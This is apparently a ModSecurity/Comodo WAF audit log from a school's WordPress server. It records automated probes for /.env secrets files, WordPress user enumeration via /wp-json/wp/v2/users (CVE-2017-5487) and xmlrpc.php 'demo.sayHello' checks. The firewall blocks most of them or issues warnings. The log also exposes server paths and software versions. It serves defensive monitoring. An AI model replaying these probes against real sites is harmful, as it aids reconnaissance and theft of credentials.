https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4bf0f27-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746721752563615 6338 (- - -) Stopwatch2: 1746721752563615 6338; combined=4742, p1=649, p2=3851, p3=36, p4=37, p5=99, sr=73, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4bf0f27-Z-- --3cda5423-A-- [08/May/2025:23:29:16 +0700] aBzb3Kcs1DvJ_HgMHE9usgAAAAA 103.236.140.4 41432 103.236.140.4 8181 --3cda5423-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.89.107.241 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.89.107.241 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --3cda5423-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3cda5423-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746721756432772 779 (- - -) Stopwatch2: 1746721756432772 779; combined=326, p1=285, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cda5423-Z-- --3d094609-A-- [08/May/2025:23:29:26 +0700] aBzb5sP9GxxPAbCroFY5EAAAAFE 103.236.140.4 41558 103.236.140.4 8181 --3d094609-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.224 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3d094609-C-- demo.sayHello --3d094609-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d094609-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746721766057872 6775 (- - -) Stopwatch2: 1746721766057872 6775; combined=5013, p1=724, p2=4058, p3=43, p4=65, p5=74, sr=67, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d094609-Z-- --de0d3e30-A-- [08/May/2025:23:34:32 +0700] aBzdGMP9GxxPAbCroFY57AAAAFg 103.236.140.4 45474 103.236.140.4 8181 --de0d3e30-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 --de0d3e30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de0d3e30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746722072340730 800 (- - -) Stopwatch2: 1746722072340730 800; combined=321, p1=270, p2=0, p3=0, p4=0, p5=51, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de0d3e30-Z-- --6055a52a-A-- [08/May/2025:23:38:24 +0700] aBzeAMP9GxxPAbCroFY6hwAAAFA 103.236.140.4 48296 103.236.140.4 8181 --6055a52a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Coolpad 3622A Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36 Accept-Charset: utf-8 --6055a52a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6055a52a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746722304991615 775 (- - -) Stopwatch2: 1746722304991615 775; combined=309, p1=271, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6055a52a-Z-- --d1bd5969-A-- [08/May/2025:23:46:29 +0700] aBzf5Y4K347NtBcwXKxvZwAAAJI 103.236.140.4 54188 103.236.140.4 8181 --d1bd5969-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.202.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.202.16 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d1bd5969-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1bd5969-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746722789956492 2692 (- - -) Stopwatch2: 1746722789956492 2692; combined=1297, p1=394, p2=866, p3=0, p4=0, p5=37, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1bd5969-Z-- --9a466655-A-- [08/May/2025:23:46:33 +0700] aBzf6cP9GxxPAbCroFY7rgAAAFU 103.236.140.4 54236 103.236.140.4 8181 --9a466655-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.202.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.202.16 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9a466655-C-- demo.sayHello --9a466655-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a466655-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746722793561047 5950 (- - -) Stopwatch2: 1746722793561047 5950; combined=4394, p1=551, p2=3605, p3=38, p4=38, p5=96, sr=73, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a466655-Z-- --5bb0554a-A-- [08/May/2025:23:53:08 +0700] aBzhdKcs1DvJ_HgMHE9zSgAAABM 103.236.140.4 59182 103.236.140.4 8181 --5bb0554a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.16 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5bb0554a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5bb0554a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746723188294567 3141 (- - -) Stopwatch2: 1746723188294567 3141; combined=1334, p1=458, p2=846, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bb0554a-Z-- --c4001260-A-- [08/May/2025:23:53:16 +0700] aBzhfMP9GxxPAbCroFY9MQAAAEQ 103.236.140.4 59286 103.236.140.4 8181 --c4001260-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.16 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c4001260-C-- demo.sayHello --c4001260-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4001260-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746723196927904 6295 (- - -) Stopwatch2: 1746723196927904 6295; combined=4754, p1=660, p2=3844, p3=41, p4=41, p5=99, sr=153, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4001260-Z-- --77f00433-A-- [08/May/2025:23:55:51 +0700] aBziF44K347NtBcwXKxwxQAAAJQ 103.236.140.4 32788 103.236.140.4 8181 --77f00433-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --77f00433-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77f00433-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746723351567174 2872 (- - -) Stopwatch2: 1746723351567174 2872; combined=1374, p1=450, p2=890, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77f00433-Z-- --6a95ea50-A-- [08/May/2025:23:55:57 +0700] aBziHY4K347NtBcwXKxw0wAAAJI 103.236.140.4 32856 103.236.140.4 8181 --6a95ea50-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.186 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6a95ea50-C-- demo.sayHello --6a95ea50-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a95ea50-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746723357719312 6339 (- - -) Stopwatch2: 1746723357719312 6339; combined=4682, p1=556, p2=3884, p3=42, p4=37, p5=97, sr=73, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a95ea50-Z-- --ca122d3e-A-- [08/May/2025:23:56:02 +0700] aBziIo4K347NtBcwXKxw2wAAAIg 103.236.140.4 32908 103.236.140.4 8181 --ca122d3e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ca122d3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca122d3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746723362704727 2946 (- - -) Stopwatch2: 1746723362704727 2946; combined=1392, p1=486, p2=874, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca122d3e-Z-- --2f999c49-A-- [08/May/2025:23:56:51 +0700] aBziUys5rYyn3jlLjjIlcQAAAMg 103.236.140.4 33458 103.236.140.4 8181 --2f999c49-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2f999c49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f999c49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746723411925326 3127 (- - -) Stopwatch2: 1746723411925326 3127; combined=1399, p1=460, p2=901, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f999c49-Z-- --39ab9321-A-- [08/May/2025:23:56:57 +0700] aBziWacs1DvJ_HgMHE90CwAAAA0 103.236.140.4 33518 103.236.140.4 8181 --39ab9321-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.57 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --39ab9321-C-- demo.sayHello --39ab9321-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --39ab9321-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746723417424481 5927 (- - -) Stopwatch2: 1746723417424481 5927; combined=4540, p1=557, p2=3751, p3=32, p4=37, p5=96, sr=71, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39ab9321-Z-- --45d0da0e-A-- [08/May/2025:23:57:19 +0700] aBzib6cs1DvJ_HgMHE90KAAAABY 103.236.140.4 33778 103.236.140.4 8181 --45d0da0e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --45d0da0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45d0da0e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746723439104578 2929 (- - -) Stopwatch2: 1746723439104578 2929; combined=1396, p1=438, p2=923, p3=0, p4=0, p5=34, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45d0da0e-Z-- --5515b724-A-- [08/May/2025:23:57:25 +0700] aBzidcP9GxxPAbCroFY95QAAAEI 103.236.140.4 33856 103.236.140.4 8181 --5515b724-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.157 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5515b724-C-- demo.sayHello --5515b724-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5515b724-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746723445888147 6498 (- - -) Stopwatch2: 1746723445888147 6498; combined=4714, p1=623, p2=3849, p3=38, p4=42, p5=97, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5515b724-Z-- --e0ec0b0c-A-- [08/May/2025:23:57:49 +0700] aBzijcP9GxxPAbCroFY98QAAAE0 103.236.140.4 34120 103.236.140.4 8181 --e0ec0b0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0ec0b0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0ec0b0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746723469769887 3309 (- - -) Stopwatch2: 1746723469769887 3309; combined=1327, p1=489, p2=808, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0ec0b0c-Z-- --85bff50e-A-- [08/May/2025:23:57:55 +0700] aBzik8P9GxxPAbCroFY99wAAAEA 103.236.140.4 34192 103.236.140.4 8181 --85bff50e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --85bff50e-C-- demo.sayHello --85bff50e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --85bff50e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] 